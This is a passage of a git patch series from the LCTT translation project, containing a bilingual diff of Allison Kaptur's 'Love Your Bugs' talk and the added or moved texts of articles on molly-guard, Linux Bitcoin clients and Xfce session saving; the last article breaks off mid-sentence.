problem. +当你部署的新版本发生问题时,第一个选项是回滚。这是非常合理的选择,但对于这个问题,它无法帮助我们。我们改变的不是服务器的状态而是客户端的——我们删除了那些出错文件。将服务器回滚可以防止更多客户端进入这种状态,但它并不能解决根本问题。 -What about increasing the size of the logging cluster? We did that – and started getting even more requests, now that we’d increased our capacity. We increased it again, but you can’t do that forever. Why not? This cluster isn’t isolated. It’s making requests into another cluster, in this case to handle exceptions. If you have a DDOS pointed at one cluster, and you keep scaling that cluster, you’re going to knock over its depedencies too, and now you have two problems. +那扩大日志集群的规模呢?我们试过了——然后因为处理能力增加了,我们开始收到更多的请求。我们又扩大了一次,但你不可能一直这么下去。为什么不能?因为这个集群并不是独立的。它会向另一个集群发送请求,在这里是为了处理异常。如果你的一个集群正在被 DDOS,而你持续扩大那个集群,你最终会把它依赖的集群也弄坏,然后你就有两个问题了。 -Another option we considered was shedding load – you don’t need every single log file, so can we just drop requests. One of the challenges here was that we didn’t have an easy way to tell good traffic from bad. We couldn’t quickly differentiate which log files were old and which were new. +我们考虑过的另一个选择是减低负载——你不需要每一个日志文件,所以我们可以直接无视一些请求。一个难点是我们并没有一个很好的方法来区分好的请求和坏的请求。我们无法快速地判断哪些日志文件是旧的,哪些是新的。 -The solution we hit on is one that’s been used at Dropbox on a number of different occassions: we have a custom header, `chillout`, which every client in the world respects. If the client gets a response with this header, then it doesn’t make any requests for the provided number of seconds. Someone very wise added this to the Dropbox client very early on, and it’s come in handy more than once over the years. The logging server didn’t have the ability to set that header, but that’s an easy problem to solve. So two of my colleagues, Isaac Goldberg and John Lai, implemented support for it. We set the logging cluster chillout to two minutes initially and then managed it down as the deluge subsided over the next couple of days. +我们最终使用的是一个 Dropbox 里许多不同场合都用过的一个解决方法:我们有一个自定义的头字段,`chillout`,全世界所有的客户端都遵守它。如果客户端收到一个有这个头字段的响应,它将在字段所标注的时间内不再发送任何请求。很早以前一个英明的程序员把它加到了 Dropbox 客户端里,在之后这些年中它已经不止一次地起了作用。 -### Know your system +### 了解你的系统 -The first lesson from this bug is to know your system. I had a good mental model of the interaction between the client and the server, but I wasn’t thinking about what would happen when the server was interacting with all the clients at once. There was a level of complexity that I hadn’t thought all the way through. +这个 bug 的第一个教训是要了解你的系统。我对于客户端和服务器之间的交互有不错的理解,但我并没有考虑到当服务器和所有这些客户端同时交互的时候会发生什么。这是一个我没有完全搞懂的层面。 -### Know your tools +### 了解你的工具 -The second lesson is to know your tools. If things go sideways, what options do you have? Can you reverse your migration? How will you know if things are going sideways and how can you discover more? All of those things are great to know before a crisis – but if you don’t, you’ll learn them during a crisis and then never forget. +第二个教训是要了解你的工具。如果出了差错,你有哪些选项?你能撤销你做的迁移吗?你如何知道事情出了差错,你又如何发现更多信息?所有这些事情都应该在危机发生之前就了解好——但如果你没有,你会在危机发生时学到它们并不会再忘记。 -### Feature flags & server-side gating +### 功能开关 & 服务器端功能控制 -The third lesson is for you if you’re writing a mobile or a desktop application:  _You need server-side feature gating and server-side flags._  When you discover a problem and you don’t have server-side controls, the resolution might take days or weeks as you push out a new release or submit a new version to the app store. That’s a bad situation to be in. The Dropbox desktop client isn’t going through an app store review process, but just pushing out a build to tens of millions of clients takes time. Compare that to hitting a problem in your feature and flipping a switch on the server: ten minutes later your problem is resolved. +第三个教训是专门针对移动端和桌面应用开发者的:_你需要服务器端功能控制和功能开关_。当你发现一个问题时如果你没有服务器端的功能控制,你可能需要几天或几星期来推送新版本或者提交新版本到应用商店中,然后问题才能得到解决。这是个很糟糕的处境。Dropbox 桌面客户端不需要经过应用商店的审查过程,但光是把一个版本推送给上千万的用户就已经要花很多时间。相比之下,如果你能在新功能遇到问题的时候在服务器上翻转一个开关:十分钟之后你的问题就已经解决了。 -This strategy is not without its costs. Having a bunch of feature flags in your code adds to the complexity dramatically. You get a combinatoric problem with your testing: what if feature A is enabled and feature B, or just one, or neither – multiplied across N features. It’s extremely difficult to get engineers to clean up their feature flags after the fact (and I was also guilty of this). Then for the desktop client there’s multiple versions in the wild at the same time, so it gets pretty hard to reason about. +这个策略也有它的代价。加入很多的功能开关会大幅提高你的代码的复杂度。而你的测试代码更是会成指数地复杂化:要考虑 A 功能和 B 功能都开启,或者仅开启一个,或者都不开启的情况——然后每个功能都要相乘一遍。让工程师们在事后清理他们的功能开关是一件很难的事情(我自己也有这个毛病)。另外,桌面客户端会同时有好几个版本有人使用,也会加大思考难度。 -But the benefit – man, when you need it, you really need it. +但是它的好处——啊,当你需要它的时候,你真的是很需要它。 -# How to love bugs +# 如何去爱 bug -I’ve talked about some bugs that I love and I’ve talked about why to love bugs. Now I want to tell you how to love bugs. If you don’t love bugs yet, I know of exactly one way to learn, and that’s to have a growth mindset. +我讲了几个我爱的 bug,也讲了为什么要爱 bug。现在我想告诉你如何去爱 bug。如果你现在还不爱 bug,我知道唯一一种改变的方法,那就是要有成长型心态。 -The sociologist Carol Dweck has done a ton of interesting research about how people think about intelligence. She’s found that there are two different frameworks for thinking about intelligence. The first, which she calls the fixed mindset, holds that intelligence is a fixed trait, and people can’t change how much of it they have. The other mindset is a growth mindset. Under a growth mindset, people believe that intelligence is malleable and can increase with effort. +社会学家 Carol Dweck 做了很多关于人们如何看待智力的研究。她找到两种不同的看待智力的心态。第一种,她叫做固定型心态,认为智力是一个固定的特征,人类无法改变自己智力的多寡。另一种心态叫做成长型心态。在成长型心态下,人们相信智力是可变的而且可以通过努力来增强。 -Dweck found that a person’s theory of intelligence – whether they hold a fixed or growth mindset – can significantly influence the way they select tasks to work on, the way they respond to challenges, their cognitive performance, and even their honesty. +Dweck 发现一个人看待智力的方式——固定型还是成长型心态——可以很大程度地影响他们选择任务的方式、面对挑战的反应、认知能力、甚至是他们的诚信度。 -[I also talked about a growth mindset in my Kiwi PyCon keynote, so here are just a few excerpts. You can read the full transcript [here][7].] +【我在新西兰 Kiwi Pycon 会议所做的主题演讲中也讨论过成长型心态,所以在此只摘录一部分内容。你可以在[这里][7]找到完整版的演讲稿】 -Findings about honesty: +关于诚信的发现: -> After this, they had the students write letters to pen pals about the study, saying “We did this study at school, and here’s the score that I got.” They found that  _almost half of the students praised for intelligence lied about their scores_ , and almost no one who was praised for working hard was dishonest. +> 在这之后,他们让学生们给笔友写信讲这个实验,信中说“我们在学校做了这个实验,这是我得的分数”。他们发现 _因智力而受到表扬的学生中几乎一半人谎报了自己的分数_ ,而因努力而受表扬的学生则几乎没有人不诚实。 -On effort: +关于努力: -> Several studies found that people with a fixed mindset can be reluctant to really exert effort, because they believe it means they’re not good at the thing they’re working hard on. Dweck notes, “It would be hard to maintain confidence in your ability if every time a task requires effort, your intelligence is called into question.” +> 数个研究发现有着固定型心态的人会不愿真正去努力,因为他们认为这意味着他们不擅长做他们正努力去做的这件事情。Dweck 写道,“如果每当一个任务需要努力的时候你就会怀疑自己的智力,那么你会很难对自己的能力保持自信。” -On responding to confusion: +关于面对困惑: -> They found that students with a growth mindset mastered the material about 70% of the time, regardless of whether there was a confusing passage in it. Among students with a fixed mindset, if they read the booklet without the confusing passage, again about 70% of them mastered the material. But the fixed-mindset students who encountered the confusing passage saw their mastery drop to 30%. Students with a fixed mindset were pretty bad at recovering from being confused. +> 他们发现有成长型心态的学生大约能理解 70% 的内容,不论里面是否有难懂的段落。在有固定型心态的学生中,那些被分配没有难懂段落的手册的学生同样可以理解大约 70%。但那些看到了难懂段落的持固定型心态的学生的记忆则降到了 30%。有着固定型心态的学生非常不擅长从困惑中恢复。 -These findings show that a growth mindset is critical while debugging. We have to recover from confusion, be candid about the limitations of our understanding, and at times really struggle on the way to finding solutions – all of which is easier and less painful with a growth mindset. +这些发现表明成长型心态对 debug 至关重要。我们必须从从困惑中重整旗鼓,诚实地面对我们理解上的不足,并时不时地在寻找答案的路上努力奋斗——成长型心态会让这些都变得更简单而且不那么痛苦。 -### Love your bugs +### 热爱你的 bug -I learned to love bugs by explicitly celebrating challenges while working at the Recurse Center. A participant would sit down next to me and say, “[sigh] I think I’ve got a weird Python bug,” and I’d say, “Awesome, I  _love_  weird Python bugs!” First of all, this is definitely true, but more importantly, it emphasized to the participant that finding something where they struggled an accomplishment, and it was a good thing for them to have done that day. +我在 Recurse Center 工作时会直白地欢迎挑战,我就是这样学会热爱我的 bug 的。有时参与者会坐到我身边说“唉,我觉得我遇到了个奇怪的 Python bug”,然后我会说“太棒了,我 _爱_ 奇怪的 Python bug!” 首先,这百分之百是真的,但更重要的是,我这样是在对参与者强调,找到让自己觉得困难的事情是一种成就,而他们做到了这一点,这是件好事。 -As I mentioned, at the Recurse Center there are no deadlines and no assignments, so this attitude is pretty much free. I’d say, “You get to spend a day chasing down this weird bug in Flask, how exciting!” At Dropbox and later at Pilot, where we have a product to ship, deadlines, and users, I’m not always uniformly delighted about spending a day on a weird bug. So I’m sympathetic to the reality of the world where there are deadlines. However, if I have a bug to fix, I have to fix it, and being grumbly about the existence of the bug isn’t going to help me fix it faster. I think that even in a world where deadlines loom, you can still apply this attitude. +像我之前说过的,在 Recurse Center 没有截止日期也没有作业,所以这种态度没有任何成本。我会说,“你现在可以花一整天去在 Flask 里找出这个奇怪的 bug 了,多令人兴奋啊!”在 Dropbox 和之后的 Pilot,我们有产品需要发布,有截止日期,还有用户,于是我并不总是对在奇怪的 bug 上花一整天而感到兴奋。所以我对有截止日期的现实也是感同身受。但是如果我有 bug 需要解决,我就必须得去解决它,而抱怨它的存在并不会帮助我之后更快地解决它。我觉得就算在截止日期临近的时候,你也依然可以保持这样的心态。 -If you love your bugs, you can have more fun while you’re working on a tough problem. You can be less worried and more focused, and end up learning more from them. Finally, you can share a bug with your friends and colleagues, which helps you and your teammates. +如果你热爱你的 bug,你可以在解决困难问题时获得更多乐趣。你可以担心得更少而更加专注,并且从中学到更多。最后,你可以和你的朋友和同事分享你的 bug,这将会同时帮助你自己和你的队友们。 -### Obrigada! +### 鸣谢! -My thanks to folks who gave me feedback on this talk and otherwise contributed to my being there: +在此向给我的演讲提出反馈以及给我的演讲提供其他帮助的人士表示感谢: * Sasha Laundy @@ -291,14 +281,14 @@ My thanks to folks who gave me feedback on this talk and otherwise contributed t * Julian Cooper -* Raphael Passini Diniz and the rest of the Python Brasil organizing team +* Raphael Passini Diniz 以及其他的 Python Brasil 组织团队成员 -------------------------------------------------------------------------------- via: http://akaptur.com/blog/2017/11/12/love-your-bugs/ 作者:[Allison Kaptur ][a] -译者:[译者ID](https://github.com/译者ID) +译者:[yixunx](https://github.com/yixunx) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 82e03e38238370e639759a56de4e20d300d22b1d Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Sat, 16 Dec 2017 21:08:21 -0500 Subject: [PATCH 0647/1627] move --- {sources => translated}/tech/20171112 Love Your Bugs.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171112 Love Your Bugs.md (100%) diff --git a/sources/tech/20171112 Love Your Bugs.md b/translated/tech/20171112 Love Your Bugs.md similarity index 100% rename from sources/tech/20171112 Love Your Bugs.md rename to translated/tech/20171112 Love Your Bugs.md From ad397cb2cb2efdbc6f843af77b68c6c6917c15bb Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Sat, 16 Dec 2017 21:53:33 -0500 Subject: [PATCH 0648/1627] Translation Request: The Most Famous Classic Text-based Adventure Game --- ...20171214 The Most Famous Classic Text-based Adventure Game.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md b/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md index 37b2999f07..898c3458ef 100644 --- a/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md +++ b/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md @@ -1,3 +1,4 @@ +yixunx translating The Most Famous Classic Text-based Adventure Game ====== **Colossal Cave Adventure** , also known as **ADVENT** , **Colossal Cave** , or **Adventure** , is a most popular text-based adventure game in the period of early 80s and late 90s. This game is also known to be historic first "interactive fiction" game. In 1976, a Programmer named **Will Crowther** wrote the early version of this game, and later a fellow programmer **Don Woods** improved the game with many features by adding scoring system, more fantasy characters and locations. This game is originally developed for **PDP-10** , a good-old giant Mainframe computer. Later, it was ported to normal home desktop computers like IBM PC and Commodore 64. The original game was written using Fortran, and later it was introduced in MS-DOS 1.0 in the early 1980s by Microsoft. From c4e933f999f8c9380271f23baa5c62ab1d0b9a35 Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 12:45:56 +0800 Subject: [PATCH 0649/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2017=E6=97=A5=20=E6=98=9F=E6=9C=9F=E6=97=A5=2012:45:5?= =?UTF-8?q?6=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ntal shutdowns-reboots with molly-guard.md | 115 ------------------ ...ntal shutdowns-reboots with molly-guard.md | 114 +++++++++++++++++ 2 files changed, 114 insertions(+), 115 deletions(-) delete mode 100644 sources/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md create mode 100644 translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md diff --git a/sources/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md b/sources/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md deleted file mode 100644 index 13f4fcb9d5..0000000000 --- a/sources/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md +++ /dev/null @@ -1,115 +0,0 @@ -Translating by lujun9972 -How to protects Linux and Unix machines from accidental shutdowns/reboots with molly-guard -====== -Oops! I did it again. I thought I was logged into my home server. Turns out [I rebooted the db server][1]. Another my not so favorite is typing "[shutdown -h 0][2]" into the wrong terminal. I know a few people who have [admitted to doing that here][3]. -![My anger that can't be contained][4] -Is there any end to the madness? Do I need to suffer from accidentally random reboots and shutdowns? After all, it is human nature to make mistakes, but one should not keep on making the same mistakes again and again. - -Recently I tweeted my frustration: - -> I seems to run into this stuff again and again :( Instead of typing: -> sudo virsh reboot d1 -> -> I just typed & rebooted my own box -> sudo reboot d1 -> -> -- nixCraft (@nixcraft) [February 19, 2017][5] - - -I come across quite a few suggestion on Twitter. Let us try out those. - -### Say hello to molly guard - -Molly-Guard **try to block you from accidentally running or shutting down or rebooting Linux servers**. From the Debian/Ubuntu package description: - -> The package installs a shell script that overrides the existing shutdown/reboot/halt/poweroff/coldreboot/pm-hibernate/pm-suspend* commands and first runs a set of scripts, which all have to exit successfully, before molly-guard invokes the real command. One of the scripts checks for existing SSH sessions. If any of the four commands are called interactively over an SSH session, the shell script prompts you to enter the name of the host you wish to shut down. This should adequately prevent you from accidental shutdowns and reboots. - -It seems [molly-guard][6] has the entry in the Jargon File: - -> A shield to prevent tripping of some Big Red Switch by clumsy or ignorant hands. Originally used of the plexiglass covers improvised for the BRS on an IBM 4341 after a programmer's toddler daughter (named Molly) frobbed it twice in one day. Later generalized to covers over stop/reset switches on disk drives and networking equipment. In hardware catalogues, you'll see the much less interesting description "guarded button". - -### How to install molly guard - -Type the following command to search and install molly-guard using [apt-get command][7] or [apt command][8]: -``` -$ apt search molly-guard -$ sudo apt-get install molly-guard -``` -Sample outputs: -[![Fig.01: Installing molly guard on Linux][9]][10] - -### Test it - -Type the [reboot command][11] or shutdown command: -``` -$ sudo reboot -# reboot -$ shutdown -h 0 -# sudo shutdown -h 0 -### running wrong command such as follows instead of -### sudo virsh reboot vm_name_here -$ sudo reboot vm_name_here -``` -Sample outputs: -![Fig.02: Molly guard saved my butt ;\)][12] -I liked molly-guard so much. I updated my apt-debian-ubuntu-common.yml file with the following lines: -``` - - apt: - name: molly-guard - -``` - -That's right. It is now part of all of my Debian and Ubuntu servers automation tasks done using Ansible tool. - - **Related** : [My 10 UNIX Command Line Mistakes][13] - -### What if molly-guard not available on my Linux distro or Unix system like FreeBSD? - -Fear not, [set shell aliases][14]: -``` -## bash shell example ### -alias reboot = "echo 'Are you sure?' If so, run /sbin/reboot" -alias shutdown = "echo 'Are you sure?' If so, run /sbin/shutdown" -``` - -You can [temporarily get rid of an aliases and run actual command][15] such as reboot: -``` -# \reboot -``` -OR -``` -# /sbin/reboot -``` -Another option is to write a [shell/perl/python script calling these and asking][16] confirmation for reboot/halt/shutdown options. - - --------------------------------------------------------------------------------- - -via: https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines-from-accidental-shutdownsreboots-with-molly-guard/ - -作者:[Vivek Gite][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.cyberciti.biz -[1]:https://www.cyberciti.biz/faq/howto-reboot-linux/ -[2]:https://www.cyberciti.biz/faq/shutdown-linux-server/ -[3]:https://www.cyberciti.biz/tips/my-10-unix-command-line-mistakes.html (My 10 UNIX Command Line Mistakes) -[4]:https://www.cyberciti.biz/media/new/cms/2017/02/anger.gif -[5]:https://twitter.com/nixcraft/status/833320792880320513 -[6]:http://catb.org/~esr/jargon/html/M/molly-guard.html -[7]://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info) -[8]://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info) -[9]:https://www.cyberciti.biz/media/new/cms/2017/02/install-molly-guard-on-linux.jpg -[10]:https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines-from-accidental-shutdownsreboots-with-molly-guard/attachment/install-molly-guard-on-linux/ -[11]:https://www.cyberciti.biz/faq/linux-reboot-command/ (See Linux/Unix reboot command examples for more info) -[12]:https://www.cyberciti.biz/media/new/cms/2017/02/saved-my-butt.jpg -[13]:https://www.cyberciti.biz/tips/my-10-unix-command-line-mistakes.html -[14]:https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html -[15]:https://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/ -[16]:https://github.com/kjetilho/clumsy_protect -[17]:https://twitter.com/nixcraft -[18]:https://facebook.com/nixcraft -[19]:https://plus.google.com/+CybercitiBiz diff --git a/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md b/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md new file mode 100644 index 0000000000..1b34c0a41b --- /dev/null +++ b/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md @@ -0,0 +1,114 @@ +使用 molly-guard 保护你的 Linux/Unix 机器不会被错误地关机/重启 +====== +我去!又是这样。 我还以为我登录到家里的服务器呢。 结果 [重启的居然是数据库服务器 ][1]。 另外我也有时会在错误终端内输入 "[shutdown -h 0][2]" 命令。 我知道有些人 [经常会犯这个错误 ][3]。 +![我的愤怒无从容忍 ][4] +有办法解决这个问题吗?我真的只能忍受这种随机重启和关机的痛苦吗? 虽说人总是要犯错的,但总不能一错再错吧。 + +最新我在 tweet 上发了一通牢骚: + +> I seems to run into this stuff again and again :( Instead of typing: +> sudo virsh reboot d1 +> +> I just typed & rebooted my own box +> sudo reboot d1 +> +> -- nixCraft (@nixcraft) [February 19,2017][5] + + +结果收到了一些建议。我们来试一下。 + +### 向你引荐 molly guard + +Molly-Guard **尝试阻止你不小心关闭或重启 Linux 服务器**。它在 Debian/Ubuntu 中的包描述为: + +> The package installs a shell script that overrides the existing shutdown/reboot/halt/poweroff/coldreboot/pm-hibernate/pm-suspend* commands and first runs a set of scripts,which all have to exit successfully, before molly-guard invokes the real command。 One of the scripts checks for existing SSH sessions。 If any of the four commands are called interactively over an SSH session, the shell script prompts you to enter the name of the host you wish to shut down。 This should adequately prevent you from accidental shutdowns and reboots。 + +貌似 [molly-guard][6] 还是个专有名词: + +> A shield to prevent tripping of some Big Red Switch by clumsy or ignorant hands。Originally used of the plexiglass covers improvised for the BRS on an IBM 4341 after a programmer's toddler daughter (named Molly) frobbed it twice in one day。 Later generalized to covers over stop/reset switches on disk drives and networking equipment。 In hardware catalogues, you'll see the much less interesting description "guarded button"。 + +### 如何安装 molly guard + +使用 [apt-get command][7] 或者 [apt command][8] 来搜索并安装 molly-guard: +``` +$ apt search molly-guard +$ sudo apt-get install molly-guard +``` +结果为: +[![Fig.01: Installing molly guard on Linux][9]][10] + +### 测试一下 + +输入 [reboot 命令 ][11] 和 shutdown 命令: +``` +$ sudo reboot +# reboot +$ shutdown -h 0 +# sudo shutdown -h 0 +### running wrong command such as follows instead of +### sudo virsh reboot vm_name_here +$ sudo reboot vm_name_here +``` +结果为: +![Fig.02: Molly guard saved my butt ;\)][12] +我超级喜欢 molly-guard。因此我将下行内容加入到 apt-debian-ubuntu-common.yml 文件中了: +``` + - apt: + name: molly-guard + +``` + +是的。我使用 Ansible 在所有的 Debian 和 Ubuntu 服务器上都自动安装上它了。 + + **相关** : [My 10 UNIX Command Line Mistakes][13] + +### 如果我的 Linux 发行版或者 Unix 系统(比如 FreeBSD) 没有 molly-guard 怎么办呢? + +不用怕,[设置 shell 别名 ][14]: +``` +## bash shell example ### +alias reboot = "echo 'Are you sure?' If so, run /sbin/reboot" +alias shutdown = "echo 'Are you sure?' If so, run /sbin/shutdown" +``` + +你也可以 [临时取消别名机制运行真正的命令 ][15]。比如要运行 reboot 可以这样: +``` +# \reboot +``` +或者 +``` +# /sbin/reboot +``` +另外你也可以写一个 [shell/perl/python 脚本来调用这些命令并要求 ][16] 确认 reboot/halt/shutdown 的选项。 + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines-from-accidental-shutdownsreboots-with-molly-guard/ + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/faq/howto-reboot-linux/ +[2]:https://www.cyberciti.biz/faq/shutdown-linux-server/ +[3]:https://www.cyberciti.biz/tips/my-10-unix-command-line-mistakes.html (My 10 UNIX Command Line Mistakes) +[4]:https://www.cyberciti.biz/media/new/cms/2017/02/anger.gif +[5]:https://twitter.com/nixcraft/status/833320792880320513 +[6]:http://catb.org/~esr/jargon/html/M/molly-guard.html +[7]://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info) +[8]://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info) +[9]:https://www.cyberciti.biz/media/new/cms/2017/02/install-molly-guard-on-linux.jpg +[10]:https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines-from-accidental-shutdownsreboots-with-molly-guard/attachment/install-molly-guard-on-linux/ +[11]:https://www.cyberciti.biz/faq/linux-reboot-command/ (See Linux/Unix reboot command examples for more info) +[12]:https://www.cyberciti.biz/media/new/cms/2017/02/saved-my-butt.jpg +[13]:https://www.cyberciti.biz/tips/my-10-unix-command-line-mistakes.html +[14]:https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html +[15]:https://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/ +[16]:https://github.com/kjetilho/clumsy_protect +[17]:https://twitter.com/nixcraft +[18]:https://facebook.com/nixcraft +[19]:https://plus.google.com/+CybercitiBiz From cc67186f21b103062e35416618b3907c731ef03d Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 13:21:41 +0800 Subject: [PATCH 0650/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=205=20of=20the=20?= =?UTF-8?q?Best=20Bitcoin=20Clients=20for=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...5 of the Best Bitcoin Clients for Linux.md | 87 +++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 sources/tech/20171215 5 of the Best Bitcoin Clients for Linux.md diff --git a/sources/tech/20171215 5 of the Best Bitcoin Clients for Linux.md b/sources/tech/20171215 5 of the Best Bitcoin Clients for Linux.md new file mode 100644 index 0000000000..c5a646fe40 --- /dev/null +++ b/sources/tech/20171215 5 of the Best Bitcoin Clients for Linux.md @@ -0,0 +1,87 @@ +5 of the Best Bitcoin Clients for Linux +====== +By now you have probably heard of [Bitcoin][1] or the [Blockchain][2]. The price of Bitcoin has skyrocketed several times in the past months, and the trend continues almost daily. The demand for Bitcoin seems to grow astronomically by the minute. + +Accompanying the demand for the digital currency is the demand for software to manage the currency: Bitcoin clients. A quick search of "Bitcoin client" on Google Play or the App Store will yield quite a number of results. There are many Bitcoin clients that support Linux, but only 5 interesting ones are mentioned here, in no particular order. + +### Why Use a Client? +A client makes it easy to manage your Bitcoin or Bitcoins. Many provide different levels of security to make sure you don't lose your precious digital currency. In short, you'll find it helpful, trust me. + +#### 1. Bitcoin Core + +![Bitcoin Core][3] + +This is the core Bitcoin client, as the name suggests. It is has a very simple interface. It is secure and provides the best privacy compared to other popular clients. On the down side, it has to download all Bitcoin transaction history, which is over a 150 GB of data. Hence, it uses more resources than many other clients. + +To get the Bitcoin Core client, visit the download [page][4]. Ubuntu users can install it via PPA: +``` +sudo add-apt-repository ppa:bitcoin / bitcoin +sudo apt update +sudo apt install bitcoin* +``` + +#### 2. Electrum +![Electrum][5] + +Electrum is another interesting Bitcoin client. It is more forgiving than most clients as funds can be recovered from a secret passphrase - no need to ever worry about forgetting keys. It provides several other features that make it convenient to manage Bitcoins such as multisig and cold storage. A plus for Electrum is the ability to see the fiat currency equivalent of your Bitcoins. Unlike Bitcoin Core, it does not require a full copy of your Bitcoin transaction history. + +The following is how to get Electrum: +``` +sudo apt-get install python3-setuptools python3-pyqt5 python3-pip +sudo pip3 install https://download.electrum.org/3.0.3/Electrum-3.0.3.tar.gz +``` + +Make sure to check out the appropriate version you want to install on the [website][6]. + +#### 3. Bitcoin Knots + +![Bitcoin Knots][13] + +Bitcoin Knots is only different from Bitcoin Core in that it provides more advanced features than Bitcoin Core. In fact, it is derived from Bitcoin Core. It is important to know some of these features are not well-tested. + +As with Bitcoin Core, Bitcoin Knots also uses a huge amount of space, as a copy of the full Bitcoin transaction is downloaded. + +The PPA and tar files can be found [here][7]. + +#### 4. Bither + +![Bither][8] + +Bither has a really simple user interface and is very simple to use. It allows password access and has an exchange rate viewer and cold/hot modes. The client is simple, and it works! + +Download Bither [here][9]. + +#### 5. Armory + +![Armory][10] + +Armory is another common Bitcoin client. It includes numerous features such as cold storage. This enables you to manage your Bitcoins without connecting to the Internet. Moreover, there are additional security measures to ensure private keys are fully secured from attacks. + +You can get the deb file from this download [site][11]. Open the deb file and install on Ubuntu or Debian. You can also get the project on [GitHub][12]. + +Now that you know a Bitcoin client to manage your digital currency, sit back, relax, and watch your Bitcoin value grow. + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/bitcoin-clients-for-linux/ + +作者:[Bruno Edoh][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com +[1]:https://www.maketecheasier.com/what-is-bitcoin-and-how-you-can-utilize-it-online/ +[2]:https://www.maketecheasier.com/bitcoin-blockchain-bundle-deals/ +[3]:https://www.maketecheasier.com/assets/uploads/2017/12/bitcoin-core-interface.png (Bitcoin Core) +[4]:https://bitcoin.org/en/download +[5]:https://www.maketecheasier.com/assets/uploads/2017/12/electrum-interface.png (Electrum) +[6]:https://electrum.org/ +[7]:https://bitcoinknots.org/ +[8]:https://www.maketecheasier.com/assets/uploads/2017/12/bitter-interface.png (Bither) +[9]:https://bither.net/ +[10]:https://www.maketecheasier.com/assets/uploads/2017/12/armory-logo2.png (Armory) +[11]:https://www.bitcoinarmory.com/download/ +[12]:https://github.com/goatpig/BitcoinArmory +[13]:https://www.maketecheasier.com/assets/uploads/2017/12/bitcoin-core-interface.png From ea5c2847e31352b466b5c87bf70a5447a98228b5 Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 13:29:25 +0800 Subject: [PATCH 0651/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Eagle's=20Path:?= =?UTF-8?q?=20(2017-12-16)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171216 Eagle's Path: (2017-12-16).md | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 sources/tech/20171216 Eagle's Path: (2017-12-16).md diff --git a/sources/tech/20171216 Eagle's Path: (2017-12-16).md b/sources/tech/20171216 Eagle's Path: (2017-12-16).md new file mode 100644 index 0000000000..6c1d2c4139 --- /dev/null +++ b/sources/tech/20171216 Eagle's Path: (2017-12-16).md @@ -0,0 +1,73 @@ +translating by lujun9972 +Saving window position in Xfce session +====== + +TLDR: If you're having problems saving window position in your Xfce session, enable save on logout and then log out and back in. This will probably fix the problem (permanently, if you like keeping the same session and turn saving back off again). See below for the details. + +I've been using Xfce for my desktop for some years now, and have had a recurring problem with saved sessions after a reboot. After logging in, all the applications from my saved session would be started, but all the workspace and window positioning data would be lost, so they'd just pile onto the default workspace like a train wreck. + +Various other people on-line have reported this over the years (there are open bugs in 